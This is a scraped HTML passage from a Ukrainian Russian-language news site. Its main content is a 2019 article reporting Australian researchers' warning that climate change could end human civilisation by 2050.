href="https://enovosty.com/news_politics/full/506-zelenskij-obratilsya-k-putinu">Зеленский обратился к Путину</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759107"> <span class="postDate">10:11</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/506-vo-skolko-gosudarstvu-vletaet-ezhegodnaya-podgotovki-shkolnika-v-ukraine">Во сколько государству "влетает" ежегодная подготовка школьника в Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759106"> <span class="postDate">10:07</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-zelenskij-rasskazal-o-sudbe-nyneshnix-ministrov">Зеленский рассказал о судьбе нынешних министров</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759105"> <span class="postDate">10:05</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/506-bez-konfuzov-nikak-donald-tramp-okonfuzilsya-v-bukingemskom-dvorce">Без конфузов никак: Дональд Трамп оконфузился в Букингемском дворце</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759104"> <span class="postDate">09:32</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-tymchuk-poyasnil-v-chem-kroetsya-novaya-zadumka-kremlya">Тымчук пояснил, в чем кроется новая задумка Кремля</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759103"> <span class="postDate">09:28</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/506-kurs-grivny-reshil-ne-zhdat-oseni-chto-proisxodit-s-grivnoj-i-stoit-li-panikovat">Курс гривны решил не ждать осени: Что происходит с гривной и стоит ли паниковать</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759100"> <span class="postDate">09:24</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-dva-cugcvanga-dlya-zelenskogo-mnenie">"Два цугцванга для Зеленского", - мнение</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759096"> <span class="postDate">09:21</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/506-fsb-trebuet-u-yandeksa-klyuchi-ot-yandeks-pochty">ФСБ требует у Яндекса ключи от «Яндекс.Почты»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759098"> <span class="postDate">09:18</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-epifanij-i-saakashvili-proveli-vstrechu-o-chem-govorili">Епифаний и Саакашвили провели встречу. О чем говорили?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759097"> <span class="postDate">09:15</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/506-novye-pravila-youtube-silno-ogranichil-detej">Новые правила: YouTube сильно ограничил детей</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759094"> <span class="postDate">09:12</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-v-ukraine-byl-start-amerikanskij-professor-gde-vozgoritsya-plamya-vojny-mezhdu-rf-i-ssha">"В Украине был старт": Американский профессор рассказал, где "возгорится пламя" войны между РФ и США</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4759202"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Человечество может исчезнуть к 2050 году &#8212; ученые</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_society">Новости общества</a> <span>&raquo;</span> Человечество может исчезнуть к 2050 году - ученые</div><time datetime="2019-06-05T22:00:44+03:00"><span id="date">Новости общества, 05.06.2019 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="share42init" data-url="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye" data-title="Человечество может исчезнуть к 2050 году - ученые" data-path="https://enovosty.com/wp-content/themes/eizvestia/img/"></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4759202" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><b><p>Существует большая вероятность того, что человеческая цивилизация может полностью исчезнуть к 2050 году из-за различных последствий изменения климата.</p></b> <div style="text-align:center;"> <img width="460" height="306" src="https://enovosty.com/wp-content/uploads/2019/06/climate-change-1-460x306.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/06/climate-change-1-e1559747307866.jpg 460w, https://enovosty.com/wp-content/uploads/2019/06/climate-change-1-112x75.jpg 112w, https://enovosty.com/wp-content/uploads/2019/06/climate-change-1-300x200.jpg 300w, https://enovosty.com/wp-content/uploads/2019/06/climate-change-1-640x426.jpg 640w" sizes="(max-width: 460px) 100vw, 460px" /> </div> <p>Австралийские ученые заявили, что нынешние климатические модели недооценивают серьезность ситуации, которая намного мрачнее, чем эти модели рисуют, поскольку изменение климата представляет собой «среднесрочную угрозу для человеческой цивилизации в краткосрочной и среднесрочной перспективе», информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>Документ продолжает предсказывать конец, начиная с того, что правительства отмахиваются от рекомендаций ученых по поиску альтернативных источников энергии, что неизбежно приводит к повышению глобальной температуры до 3 градусов по Цельсию. Это, по словам авторов, «за порогом выживаемости человека».</p><p>Согласно гипотезе авторов, смертельные тепловые условия будут происходить на 35 процентах земной поверхности в мире и 55 процентах населения планеты в течение более 20 дней в году. Почти треть земной поверхности превратится в сверхсухую пустыню.</p><p>Разрушительные засухи, наводнения и лесные пожары уничтожат экосистемы во всем мире, от ледяных щитов до коралловых рифов и тропических лесов. Эти экстремальные условия сильнее всего затронут тропические места мира, уничтожая сельское хозяйство и вытесняя в результате около миллиарда человек.</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_society/full/1605-chelovechestvo-mozhet-pogibnut-ot-udushya-uchenye" >Человечество может погибнуть от удушья - ученые</a></p><p>Беженцы и опасное сокращение имеющихся ресурсов будут напрягать даже развитые страны. По мере уменьшения ресурсов конфликт становится все более вероятным, который может перерасти в хаос, пока не наступит конец человеческой цивилизации.</p><p>В конечном счете, если люди не предпримут решительных действий против изменения климата, это неизбежно приведет к разрушению на Земле.</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4759202"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4759202&amp;_wpnonce=97871945bc"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png"/> <meta itemprop="width" content="280"> <meta itemprop="height" content="55"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Катерина Лукьянчук" /></span><meta itemprop="datePublished" content=""/><meta itemprop="dateModified" content="2019-06-05T18:08:50+03:00"/><meta itemprop="genre" content="Новости общества"/><meta itemprop="description" content="Существует большая вероятность того, что человеческая цивилизация может полностью исчезнуть к 2050 году из-за различных последствий изменения климата."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/06/climate-change-1-460x306.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/06/climate-change-1-460x306.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="306"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Катерина Лукьянчук</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/apokalipsis" rel="tag">Апокалипсис</a>, <a href="https://enovosty.com/tag/chelovechestvo" rel="tag">человечество</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 322</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="share42init" data-url="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye" data-title="Человечество может исчезнуть к 2050 году - ученые" data-path="https://enovosty.com/wp-content/themes/eizvestia/img/"></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4759202" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"><style type="text/css">#wp-social-login-connect-with{clear:both;display:block;font-size:13px;font-weight:normal;padding-top:6px}#wp-social-login-connect-options{padding:4px 0}#wp-social-login-connect-options a{text-decoration:none;margin-right:5px}#wp-social-login-connect-options img{border:0 none;width:22px}.wsl_connect_with_provider{}</style><div class="wp-social-login-widget"><div class="wp-social-login-connect-with">Войти с помощью:</div><div class="wp-social-login-provider-list"><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Facebook&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye" title="Connect with Facebook" class="wp-social-login-provider wp-social-login-provider-facebook" data-provider="Facebook"><img alt="Facebook" title="Connect with Facebook" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/facebook.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Google&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye" title="Connect with Google" class="wp-social-login-provider wp-social-login-provider-google" data-provider="Google"><img alt="Google" title="Connect with Google" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/google.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Twitter&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_society%2Ffull%2F506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye" title="Connect with Twitter" class="wp-social-login-provider wp-social-login-provider-twitter" data-provider="Twitter"><img alt="Twitter" title="Connect with Twitter" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/twitter.png" /></a></div><div class="wp-social-login-widget-clearing"></div></div> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="b1735a810b" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><div style="height: 10px; background-color: #fff;"></div><div class="mainPageWiget blogmain" style="border: 1px solid #dee7ee; padding: 0; margin: 0;"><div><a href="/vybory-2019"><img src="/wp-content/themes/eizvestia/img/vibory_2019.png" alt="Выборы 2019" /></a></div><table style="width:100%; margin-top: 5px;"><tr><td style="width:32.2999999999999971578290569595992565155029296875%;text-align: center;vertical-align: bottom; padding: 5px 2px;"><div class="img"><a href="https://enovosty.com/news_politics/full/506-zelenskij-rasskazal-o-sudbe-nyneshnix-ministrov" title="Зеленский рассказал о судьбе нынешних министров"><img style="width: 145px; height:94px" alt="Зеленский рассказал о судьбе нынешних министров" src="/wp-content/themes/eizvestia/img/vybory_2019.jpg"></a></div></td><td style="width:32.2999999999999971578290569595992565155029296875%;text-align: center;vertical-align: bottom; padding: 5px 2px;"><div class="img"><a href="https://enovosty.com/news_politics/full/406-eto-opasnaya-lovushka-kakim-vidit-dialog-ukrainy-i-rf-svyatoslav-vakarchuk" title="Это опасная ловушка: Каким видит диалог Украины и РФ Святослав Вакарчук"><img style="width: 145px; height:94px" alt="Это опасная ловушка: Каким видит диалог Украины и РФ Святослав Вакарчук" src="/wp-content/themes/eizvestia/img/vybory_2019.jpg"></a></div></td><td style="width:32.2999999999999971578290569595992565155029296875%;text-align: center;vertical-align: bottom; padding: 5px 2px;"><div class="img"><a href="https://enovosty.com/news_politics/full/406-usilivat-i-pomogat-vakarchuk-budet-kontrolirovat-zelenskogo" title="Усиливать и помогать: Вакарчук будет контролировать Зеленского"><img style="width: 145px; height:94px" alt="Усиливать и помогать: Вакарчук будет контролировать Зеленского" src="/wp-content/themes/eizvestia/img/vybory_2019.jpg"></a></div></td></tr><tr><td style="width:32.2999999999999971578290569595992565155029296875%;"><a class="postTitle" href="https://enovosty.com/news_politics/full/506-zelenskij-rasskazal-o-sudbe-nyneshnix-ministrov" style="color: #000000; font-size: 12px; line-height: 13px;">Зеленский рассказал о судьбе нынешних министров</a></td><td style="width:32.2999999999999971578290569595992565155029296875%;"><a class="postTitle" href="https://enovosty.com/news_politics/full/406-eto-opasnaya-lovushka-kakim-vidit-dialog-ukrainy-i-rf-svyatoslav-vakarchuk" style="color: #000000; font-size: 12px; line-height: 13px;">"Это опасная ловушка": Каким видит диалог Украины и РФ Святослав Вакарчук</a></td><td style="width:32.2999999999999971578290569595992565155029296875%;"><a class="postTitle" href="https://enovosty.com/news_politics/full/406-usilivat-i-pomogat-vakarchuk-budet-kontrolirovat-zelenskogo" style="color: #000000; font-size: 12px; line-height: 13px;">"Усиливать и помогать": Вакарчук будет контролировать Зеленского</a></td></tr></table><div class="more"><a href="/vybory-2019">Все Выборы</a></div></div><div style="height: 10px; background-color: #fff;"></div> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4759227"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/politika/full/506-itogi-dnya-novyj-udar-po-rossii-referendumy-zelenskogo-i-tragediya-na-donbasse">Итоги дня: Новый удар по России, референдумы Зеленского и трагедия на Донбассе</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4759113"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/506-skazka-lozh-da-v-nej-namek-est-li-ugroza-defolta-v-ukraine">Сказка - ложь, да в ней намек: есть ли угроза дефолта в Украине?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4759102"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/finance/full/506-vladimir-stelmax-ekonomika-nuzhdaetsya-v-antiimportnoj-industrializacii-i-snizhenii-kreditnyx-stavok">Владимир Стельмах: Экономика нуждается в антиимпортной индустриализации и снижении кредитных ставок</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4759036"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/406-itogi-dnya-debyut-zelenskogo-modnyj-prigovor-trampa-i-strannye-nyuansy-vokrug-ubijstva-malchika-pod-kievom">Итоги дня: Дебют Зеленского, модный приговор Трампа и странные нюансы вокруг убийства мальчика под Киевом</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4758863"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/markets/full/406-axmetova-zavodyat-v-centrenergo">Ахметова заводят в «Центрэнерго»</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4758762"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/306-itogi-dnya-novoe-pravopisanie-neprostoe-vremya-trampa-i-sud-v-gaage">Итоги дня: Новое правописание, непростое время Трампа и суд Украины против России в Гааге</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4758820"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/306-vybory-v-evroparlament-pravogo-potopa-ne-sluchilos-no-mnogix-osnovatelno-zalilo">Выборы в Европарламент: «правого потопа» не случилось, но многих основательно «залило»!</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4758532"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/3105-itogi-dnya-pryzhok-zelenogo-chistka-v-rukovodstve-sbu-i-novyj-sostav-snbo">Итоги дня: Прыжок "зеленого", "чистка" в руководстве СБУ и новый состав СНБО</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4758353"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/3005-itogi-dnya-katastrofa-vertoleta-vsu-nedootstavka-grojsmana-i-razvyazannye-ruki-nabu">Итоги дня: Катастрофа вертолета ВСУ, недоотставка Гройсмана и "развязанные руки" НАБУ</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4758183"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/3005-anbandling-naftogaza-kak-podelit-i-sebya-ne-obdelit">Анбандлинг «Нафтогаза»: как поделить и себя не обделить?</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_kiev/full/206-v-kievskom-supermarkete-zasnyali-kota-poedavshego-myaso-pryamo-s-vitriny-video"><img width="142" height="88" alt="В киевском супермаркете засняли кота, поедавшего мясо прямо с витрины" src="https://enovosty.com/wp-content/uploads/2019/06/7f44a1a6081e15bf62b688a694cb8cbc-e1559483055716.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_kiev/full/206-v-kievskom-supermarkete-zasnyali-kota-poedavshego-myaso-pryamo-s-vitriny-video">В киевском супермаркете засняли кота, поедавшего мясо прямо с витрины</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/506-donald-tramp-zadremal-vo-vremya-rechi-korolevy-elizavety-ii-video"><img width="142" height="88" alt="Дональд Трамп задремал во время речи королевы Елизаветы II" src="https://enovosty.com/wp-content/uploads/2019/06/76-e1559729253683.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/506-donald-tramp-zadremal-vo-vremya-rechi-korolevy-elizavety-ii-video">Дональд Трамп задремал во время речи королевы Елизаветы II</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_politics/full/3005-rakety-letyat-pryamo-v-derevozemlyanuyu-ognevuyu-tochku-azov-razgromil-pexotu-vraga-video"><img width="142" height="88" alt="Ракеты летят прямо в деревоземляную огневую точку: Азов разгромил пехоту врага" src="https://enovosty.com/wp-content/uploads/2019/05/pehota.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/3005-rakety-letyat-pryamo-v-derevozemlyanuyu-ognevuyu-tochku-azov-razgromil-pexotu-vraga-video">Ракеты летят прямо в деревоземляную огневую точку: Азов разгромил пехоту врага</a></div></td></tr><tr><td class="view"><span><i></i>4888</span></td><td class="view"><span><i></i>3623</span></td><td class="view last"><span><i></i>3378</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_technology/full/406-mozhet-unichtozhit-vse-britancy-pokazali-oruzhie-budushhego-video"><img width="142" height="88" alt="Может уничтожить все: Британцы показали оружие будущего" src="https://enovosty.com/wp-content/uploads/2019/06/1_2-e1559645891359.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_technology/full/406-mozhet-unichtozhit-vse-britancy-pokazali-oruzhie-budushhego-video">Может уничтожить все: Британцы показали оружие будущего</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news-culture/full/3005-chernobyl-ot-nvo-stal-samym-rejtingovym-serialom-vsex-vremen"><img width="142" height="88" alt="Чернобыль от НВО стал самым рейтинговым сериалом всех времен" src="https://enovosty.com/wp-content/uploads/2019/05/2341836.jpeg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-culture/full/3005-chernobyl-ot-nvo-stal-samym-rejtingovym-serialom-vsex-vremen">Чернобыль от НВО стал самым рейтинговым сериалом всех времен</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/politika-video/full/506-ukrainskie-katera-tipa-island-proshli-pervye-ispytaniya-v-ssha-video"><img width="142" height="88" alt="Украинские катера типа Island прошли первые испытания в США" src="https://enovosty.com/wp-content/uploads/2019/06/maxresdefault-e1559729515847.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/politika-video/full/506-ukrainskie-katera-tipa-island-proshli-pervye-ispytaniya-v-ssha-video">Украинские катера типа Island прошли первые испытания в США</a></div></td></tr><tr><td class="view"><span><i></i>3365</span></td><td class="view"><span><i></i>3257</span></td><td class="view last"><span><i></i>1778</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/1605-chelovechestvo-mozhet-pogibnut-ot-udushya-uchenye" rel="bookmark">Человечество может погибнуть от удушья - ученые</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/2901-opredeleny-glavnye-globalnye-problemy-chelovechestva" rel="bookmark">Определены главные глобальные проблемы человечества</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2601-konec-sveta-blizok-strelki-chasov-sudnogo-dnya-vnov-pereveli" rel="bookmark">Конец света близок: стрелки часов "Судного дня" вновь перевели</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_technology/full/1512-uchenye-vyyasnili-pochemu-chelovechestvu-grozit-nexvatka-presnoj-vody" rel="bookmark">Ученые выяснили, почему человечеству грозит нехватка пресной воды</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_technology/full/2911-najdeno-mesto-zarozhdeniya-chelovechestva" rel="bookmark">Найдено место зарождения человечества</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_technology/full/511-apokalipsis-ne-za-gorami-iz-steny-placha-vylezla-zmeya-video" rel="bookmark">Апокалипсис не за горами: из Стены Плача вылезла змея (ВИДЕО)</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/zdorove/full/2510-vyyavleny-bakterii-sposobnye-unichtozhit-chelovechestvo" rel="bookmark">Выявлены бактерии способные уничтожить человечество</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_technology/full/1010-na-poroge-smerti-nazvali-novuyu-datu-apokalipsisa" rel="bookmark">На пороге смерти: назвали новую дату Апокалипсиса</a><br /></td> </tr><tr></tr></table></div><script>jQuery(document).ready(function($){function region(){html = $('#lastafishasingle .anythingWindow .activePage .region').html();$('#lastafishasingle .head span').html(html);}$('#sliderafishasingle').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><style>#sliderafishasingle .tact li{float:left;width:220px;line-height:8px}#lastafishasingle div.anythingSlider-minimalist-round{margin:auto}#lastafishasingle .postafisha{width:224px}#lastafishasingle h2{text-align:left;padding:10px 32px 10px 35px}#lastafishasingle .title a{display:block;font-size:13px;font-weight:700;text-align:left}#lastafishasingle{margin-bottom:10px;padding:0}#lastafishasingle .title{padding:5px 35px 5px 25px}#lastafishasingle.slide div.anythingSlider-minimalist-round .back,#lastafishasingle.slide div.anythingSlider-minimalist-round .forward{width:40px;height:132px;opacity:1;background-color:transparent}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("img/slider-arrows1.png") no-repeat;width:20px;height:45px;margin-top:54px;margin-left:10px}#lastafishasingle{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha5.png") repeat;border:1px solid #daa36b;-moz-background-size:100%; -webkit-background-size:100%; -o-background-size:100%; background-size:100%}#lastafishasingle .anythingSlider{border-bottom:1px solid #a99168}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha_arrows3.png") no-repeat}#lastafishasingle.slide div.anythingSlider-minimalist-round .forward a{background-position:right 0;margin-left:18px}#lastafishasingle .allafisha{display:block;text-align:right;font-size:14px;font-weight:bold;margin:0;padding:6px 10px 6px}#lastafishasingle .postafisha{position:relative}#lastafishasingle h2 span{float:right;font-size:11px;line-height:18px}#lastafishasingle .region{font-size:13px;text-align:left;padding:0 25px 5px}#lastafishasingle.slide.ssingle h2{padding:10px 17px 3px 40px;font-size:17px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .back,#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward{width:27px;right:-5px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .arrow 